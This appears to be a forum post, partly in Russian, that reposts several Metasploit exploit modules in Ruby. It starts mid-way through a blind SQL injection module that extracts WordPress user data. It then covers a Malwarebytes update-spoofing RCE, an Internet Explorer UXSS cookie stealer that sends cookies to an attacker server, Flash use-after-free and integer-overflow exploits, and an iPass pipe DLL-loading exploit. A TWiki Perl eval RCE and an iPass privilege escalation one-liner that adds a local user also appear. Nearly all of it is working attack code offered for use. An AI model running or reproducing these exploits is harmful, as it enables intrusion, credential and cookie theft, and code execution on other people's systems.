            payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x#{schema.unpack("H*")[0]} LIMIT #{t},1),#{l},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 5819*(SELECT 5819 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

            res = send_injected_request(payload, gallery_id)

            name << (c+1).chr if res.body.length == real_length
            vprint_status("Found char #{(c+1).chr}") if res.body.length == real_length
            break if res.body.length == real_length
          end
        end
        print_status("Found table #{name}")
        tables << name if name =~ /users$/
      end

      print_status("Found #{tables.length} possible user tables. Enumerating users.")

      tables.each do |table|
        # Row count read digit by digit (ORD 48..58 range) until a position
        # yields no digit; the digits are accumulated as a string.
        table_count = ''
        char = 'a'

        i = 1
        while char
          char = nil
          58.downto(48) do |c|
            payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{schema}.#{table}),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 8335*(SELECT 8335 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

            res = send_injected_request(payload, gallery_id)

            char = (c+1).chr if res.body.length == real_length
            vprint_status("Found char #{char}") if char
            table_count << char if char
            break if char
          end
          i = i + 1
        end

        table_count = table_count.to_i

        print_status("Table #{table} has #{table_count} rows.")
        user_cols = ["ID", "user_url", "user_pass", "user_login", "user_email", "user_status", "display_name", "user_nicename", "user_registered", "user_activation_key"]

        # Per row and column: CHAR_LENGTH read digit by digit, same scheme as
        # the row count. length starts as the string '0' and has digits
        # appended before to_i, so '0' + '12' becomes 12.
        0.upto(table_count-1) do |t|
          user_cols.each do |col|
            i = 1
            length = '0'
            char = 'a'

            while char
              char = nil
              58.downto(48) do |c|
                payload = ",(SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(#{col}) AS CHAR),0x20) FROM #{schema}.#{table} ORDER BY ID LIMIT #{t},1),#{i},1)) NOT BETWEEN 0 AND #{c}) THEN 0x2061736320 ELSE 7837*(SELECT 7837 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

                res = send_injected_request(payload, gallery_id)

                char = (c+1).chr if res.body.length == real_length
                vprint_status("Found char #{char}") if char
                length << char if char
                break if char
              end
              i = i + 1
            end

            length = length.to_i
            print_status("Column #{col} of row #{t} has a length of #{length}")
          end
        end
      end
    end
  end

  # Sends one probe: the baseline parameters with the given gallery ID and
  # the injection appended to order_by after "asc ".
  #
  # @param payload [String] SQL fragment appended to the order_by value
  # @param gallery_id [Integer, nil] gallery ID to use
  # @return [Rex::Proto::Http::Response, nil] whatever send_request_cgi returns
  def send_injected_request(payload, gallery_id)
    parms = get_params
    parms['gallery_id'] = gallery_id
    parms['order_by'] = 'asc ' + payload

    return send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'vars_get' => parms
    })
  end

end
 
Malwarebytes Anti-Malware / Anti-Exploit Update Remote Code Execution Exploit

This Metasploit module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This Metasploit module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
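class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer

  # The two paths a vulnerable client requests from its update host: the
  # version check, and then the setup executable matched by EXE_REGEX.
  VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/
  EXE_REGEX     = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/
  # Version string returned to each product in the version-check reply.
  NEXT_VERSION  = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }

  # Module metadata and options. The update channel is plain HTTP on port 80
  # (the SSL options are deregistered because the clients cannot use them), so
  # whoever answers for the update server name is trusted; the missing package
  # validation named in the description is the root cause.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the update functionality of
        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes
        Anti-Exploit consumer 1.03.1.1220.
        Due to the lack of proper update package validation a man-in-the-middle
        attacker could execute arbitrary code by spoofing the update server
        data-cdn.mbamupdates.com and uploading an executable. This module has
        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Yonathan Klijnsma',  # Vulnerability discovery and PoC
          'Gabor Seljan',       # Metasploit module
          'todb'                # Module refactoring
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4936' ],
          [ 'OSVDB', '116050' ], # reference type was ' OSVDB' (stray leading space)
          [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 16 2014',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])
      ], self.class)

    # Vulnerable Malwarebytes clients do not allow altering these.
    deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end

  # Routes a client request by path: the version check decides whether an
  # update notice or an empty page goes back, the setup path gets the payload,
  # anything else an empty page.
  def on_request_uri(cli, request)
    case request.uri
    when VERSION_REGEX
      # Capture 1 is the package name matched by VERSION_REGEX in the `when`.
      if set_exploit_target(Regexp.last_match(1), request)
        serve_update_notice(cli)
      else
        # Client is not vulnerable (or the package is unknown): answer with an
        # empty page. Previously this path tried to reach `cli` from
        # set_exploit_target, where it is not in scope.
        serve_default_response(cli)
      end
    when EXE_REGEX
      serve_exploit(cli)
    else
      vprint_status "Sending empty page for #{request.uri}"
      serve_default_response(cli)
    end
  end

  # Empty 200 response used for every request we do not want to act on.
  def serve_default_response(cli)
    send_response(cli, '')
  end

  # Reads the client version from the User-Agent ("base:a.b.c.d") and compares
  # it with the version we advertise for MBAM.
  #
  # @param request [Rex::Proto::Http::Request]
  # @return [Boolean] true when the reported version is not newer than
  #   NEXT_VERSION[:mbam]; false when the header is missing or the client is newer
  def check_client_version(request)
    return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/

    this_version = Regexp.last_match(1)
    next_version = NEXT_VERSION[:mbam]
    return true if Gem::Version.new(next_version) >= Gem::Version.new(this_version)

    print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."
    false
  end

  # Records which product is talking to us and which version to advertise.
  #
  # @param package [String] "mbam" or "mbae", as captured from the request path
  # @param request [Rex::Proto::Http::Request]
  # @return [Array, false, nil] the [name, version] pair stored in
  #   @client_software; false for a non-vulnerable MBAM client; nil for an
  #   unrecognised package
  def set_exploit_target(package, request)
    case package
    when /mbam/i
      return false unless check_client_version(request)

      @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]
    when /mbae/i
      # We don't get identifying info from MBAE
      @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]
    end
  end

  # Answers the version check with the advertised version; @client_software is
  # set by set_exploit_target before this is called.
  def serve_update_notice(cli)
    software,next_version = @client_software
    print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."
    send_response(cli, next_version,
                  'Content-Type' => 'application/octet-stream'
                 )
  end

  # Serves the generated payload executable where the client expects the
  # setup package.
  def serve_exploit(cli)
    print_status "Sending payload EXE..."
    send_response(cli, generate_payload_exe,
                  'Content-Type' => 'application/x-msdos-program'
                 )
  end

end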
 
Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection Exploit

Description:
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot have X-Frame-Options or it will fail). You can also have your own custom JavaScript by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if you are behind NAT.
Usage info:
msf > use auxiliary/gather/ie_uxss_injection
msf auxiliary(ie_uxss_injection) > show actions ...actions...
msf auxiliary(ie_uxss_injection) > set ACTION <action-name>
msf auxiliary(ie_uxss_injection) > show options ...show and set options...
msf auxiliary(ie_uxss_injection) > run

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
# Module metadata and options. TARGET_URI is the page whose cookie is read;
# per the description it must be frameable (no X-Frame-Options).
def initialize(info={})
  super(update_info(info,
    'Name' => "Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
    'Description' => %q{
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
you are behind NAT.
},
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'David Leo', # Original discovery
        'filedescriptor', # PoC
        'joev', # He figured it out really
        'sinn3r' # MSF
      ],
    'References' =>
      [
        [ 'CVE', '2015-0072' ],
        [ 'OSVDB', '117876' ],
        [ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
        [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
        [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
      ],
    'Platform' => 'win',
    'DisclosureDate' => "Feb 1 2015"
  ))
  register_options(
    [
      OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
      OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
    ], self.class)
end
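# Validates TARGET_URI before the server starts: it is written into an iframe
# src and a redirect, so it has to be an absolute http(s) URL.
#
# @raise [Msf::OptionValidateError] when TARGET_URI does not start with "http"
def setup
  # \A anchors to the start of the whole value; ^ would also accept a
  # multi-line value whose second line starts with http.
  raise Msf::OptionValidateError.new(['TARGET_URI']) unless target_uri =~ /\Ahttp/i

  super
end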
# The URL of the page loaded into the hidden target iframe.
#
# @return [String, nil] the TARGET_URI option as stored in the datastore
def target_uri
  uri = datastore['TARGET_URI']
  uri
end
# Renders the attack page once and caches it for later requests.
#
# @return [String] the HTML produced by #html
def get_html
  @html = html if @html.nil?
  @html
end
# Random ".php" path name used for the cookie-receiving request; generated
# once per module instance so the JS, the regex in on_request_uri and
# extract_cookie all agree.
#
# @return [String]
def ninja_cookie_stealer_name
  @ninja = "#{Rex::Text.rand_text_alpha(5)}.php" if @ninja.nil?
  @ninja
end
# Builds the absolute URL of this server as the victim should reach it.
# Host preference: URIHOST option, then the local address facing the client,
# then srvhost_addr. The port is omitted when it is the scheme default and
# URIPORT is 0.
#
# @param cli [Rex::Socket] connected client, used to pick the source address
# @return [String] scheme + host + optional port + resource path
def get_uri(cli=self.cli)
  ssl = datastore["SSL"]
  scheme = ssl ? "https://" : "http://"

  host =
    if datastore['URIHOST']
      datastore['URIHOST']
    elsif cli && cli.peerhost
      Rex::Socket.source_address(cli.peerhost)
    else
      srvhost_addr
    end
  # IPv6 literals need brackets inside a URL authority.
  host = "[#{host}]" if Rex::Socket.is_ipv6?(host)

  port_part =
    if datastore['URIPORT'] != 0
      ":#{datastore['URIPORT']}"
    elsif (ssl && datastore["SRVPORT"] == 443) || (!ssl && datastore["SRVPORT"] == 80)
      ''
    else
      ":#{datastore["SRVPORT"]}"
    end

  scheme + host + port_part + get_resource
end
# Memoised result of get_uri, computed on first use.
#
# @return [String]
def server_uri
  @server_uri = get_uri if @server_uri.nil?
  @server_uri
end
# JavaScript executed inside the TARGET_URI frame: CUSTOMJS verbatim when set,
# otherwise a one-liner that sends document.cookie to this server as an <img>
# GET to ninja_cookie_stealer_name, which on_request_uri picks up.
#
# @return [String]
def js
  datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
end
# Page served to the victim. Two hidden iframes are created (our redirect.php,
# which on_request_uri bounces to TARGET_URI, and TARGET_URI itself); the script
# then posts the base64 of `js` into the second frame once it signals back,
# after a synchronous request to sleep.php. The nested backslash escaping in
# the payload string appears to pass through several string layers on the way
# to the javascript: URL, so keep this literal byte-for-byte. On the target
# side the X-Frame-Options header named in the description breaks the chain.
#
# @return [String]
def html
  %Q|
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
<script>
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
</script>
|
end
# Auxiliary entry point; delegates to exploit, presumably provided by the
# HttpServer mixin, which starts the server.
def run
  exploit
end
# Pulls the URL-decoded `data` value out of a request to the cookie path.
#
# @param uri [String, #to_s] request URI
# @return [String] decoded value, or "" when the pattern does not match
def extract_cookie(uri)
  pattern = /#{ninja_cookie_stealer_name}\?data=(.+)/
  captured = uri.to_s.scan(pattern).flatten.first.to_s
  Rex::Text.uri_decode(captured)
end
# Request dispatcher. Order matters: redirect.php and sleep.php are checked
# before the random cookie path, and any other URI receives the attack page.
#
# @param cli [Rex::Socket] connected client
# @param request [Rex::Proto::Http::Request]
def on_request_uri(cli, request)
  uri = request.uri

  if uri =~ /redirect\.php/
    print_status("Sending redirect")
    send_redirect(cli, "#{datastore['TARGET_URI']}")
  elsif uri =~ /sleep\.php/
    # Held open deliberately; the page fetches this synchronously.
    sleep(3)
    send_response(cli, '')
  elsif uri =~ /#{ninja_cookie_stealer_name}/
    cookie = extract_cookie(uri)
    if cookie.blank?
      print_status("The XSS worked, but no cookie")
    else
      print_status("Got cookie")
      print_line(cookie)
      report_note(
        host: cli.peerhost,
        type: 'ie.cookie',
        data: cookie
      )
      path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, cookie, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
      vprint_good("Cookie stored as: #{path}")
    end
  else
    print_status("Sending HTML")
    send_response(cli, get_html)
  end
end
 
Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free Exploit

Description:
This Metasploit module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This Metasploit module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
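class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. BrowserRequirements restrict delivery to IE on Windows 7
  # with a 16.x Flash build no newer than 16.0.0.287. The bound is compared
  # with Gem::Version (as the sibling copyPixelsToByteArray module does); the
  # earlier plain String comparison ordered e.g. "16.0.0.1000" before
  # "16.0.0.287".
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
      'Description'         => %q{
        This module exploits an use after free vulnerability in Adobe Flash Player. The
        vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
        to uncompress() a malformed byte stream. This module has been tested successfully
        on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
        16.0.0.235.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'hdarwin', # Public exploit by @hdarwin89
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0311'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
          ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          # correct? guards against a malformed version string raising inside
          # the requirement check.
          :flash   => lambda { |ver| ver =~ /^16\./ && Gem::Version.correct?(ver) && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287') },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Apr 28 2014',
      'DefaultTarget'       => 0))
  end

  # Loads the prebuilt SWF once, then hands control to the server mixin.
  def exploit
    @swf = create_swf
    super
  end

  # Serves the SWF for *.swf requests and the loader HTML for everything else;
  # both replies carry no-cache headers.
  #
  # @param cli [Rex::Socket]
  # @param request [Rex::Proto::Http::Request]
  # @param target_info [Hash] browser fingerprint gathered by the mixin
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Builds the page that embeds the SWF as a 1x1 object. The PowerShell command
  # generated from the target payload travels base64-encoded in the "sh"
  # FlashVar — what a proxy or endpoint sensor would see on the wire.
  #
  # @return [Array(String, Binding)] ERB template and the binding to render it with
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  # Reads the prebuilt SWF shipped in the framework data directory.
  #
  # @return [String] raw SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
    ::File.binread(path)
  end

end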

Или используем обновление системы, кто юзает версию от GitHub
Код:
sudo msfupdate
Остальные же ручками качают фарш и кладут все хозяйство в нужные папочки.., при запуске сплоита, он скажет, чего ему не хватает...
 
iPass Control Pipe Remote Command Execution Exploit

This Metasploit module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused to force the service to load a DLL from a SMB share.
.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
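class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client::Authenticated
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  # Module metadata. Per the description the control pipe is reachable by
  # BUILTIN\Users and accepts a command that makes the service load a DLL from
  # a UNC path; tightening the pipe ACL and blocking outbound SMB from the
  # host are the corresponding mitigations.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IPass Control Pipe Remote Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the IPass Client service. This service provides a
        named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
        to force the service to load a DLL from a SMB share.
      },
      'Author'         =>
        [
          'Matthias Kaiser', # Vulnerability discovery
          'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-0925' ],
          [ 'OSVDB', '117423' ],
          [ 'BID', '72265' ],
          [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'         =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'        => 'win',
      'Targets'         =>
        [
          [ 'Windows x32', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'Privileged'      => true,
      'DisclosureDate'  => 'Jan 21 2015',
      'DefaultTarget'   => 0))

    register_options(
      [
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
      ], self.class)

    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
  end

  # Sends a harmless echo command over the control pipe and looks for the
  # echoed token in the reply. Connection and login failures are reported and
  # mapped to Unknown instead of propagating.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    echo_value = rand_text_alphanumeric(rand(10) + 10)

    response = send_command("System.Echo #{echo_value}")
    # echo_value is alphanumeric, so a substring test equals the Regexp that
    # used to be built from it; to_s keeps a nil reply from raising.
    if response.to_s.include?(echo_value)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Unknown
    end
  rescue Rex::ConnectionError => e
    vprint_error("Connection failed: #{e.class}: #{e}")
    Exploit::CheckCode::Unknown
  rescue Rex::Proto::SMB::Exceptions::LoginError
    vprint_error('Connection reset during login')
    Exploit::CheckCode::Unknown
  end

  # Picks random share and DLL names so the served UNC path differs per run.
  def setup
    super
    self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
    self.share = Rex::Text.rand_text_alpha(5)
  end

  # Publishes the payload DLL on our share and asks the service to load it by
  # UNC path. Presumably invoked by the share mixin once the server is up.
  def primer
    self.file_contents = generate_payload_dll
    print_status("File available on #{unc}...")
    send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
  end

  # Writes one command to the service control pipe and returns the reply text.
  # The command goes through Rex::Text.to_unicode and the reply back through
  # Rex::Text.to_ascii.
  #
  # @param command [String]
  # @return [String]
  def send_command(command)
    # The connection is closed after each command, so we have to reopen it
    connect
    smb_login
    pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
    pipe.write(Rex::Text.to_unicode(command))
    # NOTE(review): nothing here disconnects or closes the pipe explicitly; the
    # remote end reportedly closes after each command — confirm the client
    # mixin releases the local socket.
    Rex::Text.to_ascii(pipe.read)
  end

  # Bounds how long the share stays up waiting for the DLL request. Hitting
  # SMB_DELAY is expected and simply ends the run.
  def exploit
    Timeout.timeout(datastore['SMB_DELAY']) { super }
  rescue Timeout::Error
    # do nothing... just finish exploit and stop smb server...
  end

end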

-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
Не из метасплоита, но по теме...
-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
iPass Mobile Client 2.4.2.15122 Privilege Escalation Vulnerability

EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c
net user mogwai mogwai /ADD;;
-**-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
 
TWiki Debugenableplugins Remote Code Execution Exploit

TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in a Perl eval statement, which allows remote code execution.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
  
require 'msf/core'
  
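class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata. Root cause per the description: the debugenableplugins
  # request parameter reaches a Perl eval without sanitization, so any request
  # carrying that parameter is worth alerting on.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'TWiki Debugenableplugins Remote Code Execution',
      'Description' => %q{
        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.
        The value of the debugenableplugins parameter is used without proper sanitization
        in an Perl eval statement which allows remote code execution
      },
      'Author' =>
        [
          'Netanel Rubin', # from Check Point - Discovery
          'h0ng10', # Metasploit Module

        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2014-7236'],
          [ 'OSVDB', '112977'],
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
        ],
      'Privileged' => false,
      'Targets' =>
        [
          [ 'Automatic',
            {
              'Payload'        =>
                {
                  'BadChars' => "",
                  'Compat'      =>
                    {
                      'PayloadType' => 'cmd',
                      'RequiredCmd' => 'generic perl python php',
                    }
                },
              'Platform' => ['unix'],
              'Arch' => ARCH_CMD
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 09 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
      ], self.class)
  end

  # POSTs Perl code in the debugenableplugins parameter. The value is
  # "<PLUGIN>;<code>;exit" with the separators pre-encoded as %3b and the code
  # passed through CGI.escape (assumes the cgi stdlib is loaded by the
  # framework, as the original did).
  #
  # @param perl_code [String]
  # @return the response from the bang variant of send_request_cgi, or nil
  def send_code(perl_code)
    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"

    send_request_cgi!(
      'method' => 'POST',
      'uri' => target_uri.path,
      'data' => data
    )
  end

  # Prints two random tokens through the eval and looks for their
  # concatenation as the whole body of a 200 reply.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    rand_1 = rand_text_alpha(5)
    rand_2 = rand_text_alpha(5)

    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
    res = send_code(code)

    return CheckCode::Vulnerable if res && res.code == 200 && res.body == rand_1 + rand_2

    CheckCode::Unknown
  end

  # Sends the command payload through system() from a base64 literal and then
  # starts the handler. The HTTP response is not needed (it was previously
  # assigned and never read).
  def exploit
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
    code += "require('MIME/Base64.pm');MIME::Base64->import();"
    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
    send_code(code)
    handler
  end

end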
 
Adobe Flash Player copyPixelsToByteArray Integer Overflow

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

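class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. BrowserRequirements restrict delivery to IE on Windows 7
  # with a 14.x Flash build no newer than 14.0.0.176 (Gem::Version comparison).
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
      'Description' => %q{
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
in the copyPixelsToByteArray method from the BitmapData object. The position field of the
destination ByteArray can be used to cause an integer overflow and write contents out of
the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit
          'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
          'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it
          'juan vazquez' # msf module
        ],
      'References' =>
        [
          ['CVE', '2014-0556'],
          ['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
          ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
          ['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
        ],
      'Payload' =>
        {
          'DisableNops' => true
        },
      'Platform' => 'win',
      'BrowserRequirements' =>
        {
          :source => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') },
          :arch => ARCH_X86
        },
      'Targets' =>
        [
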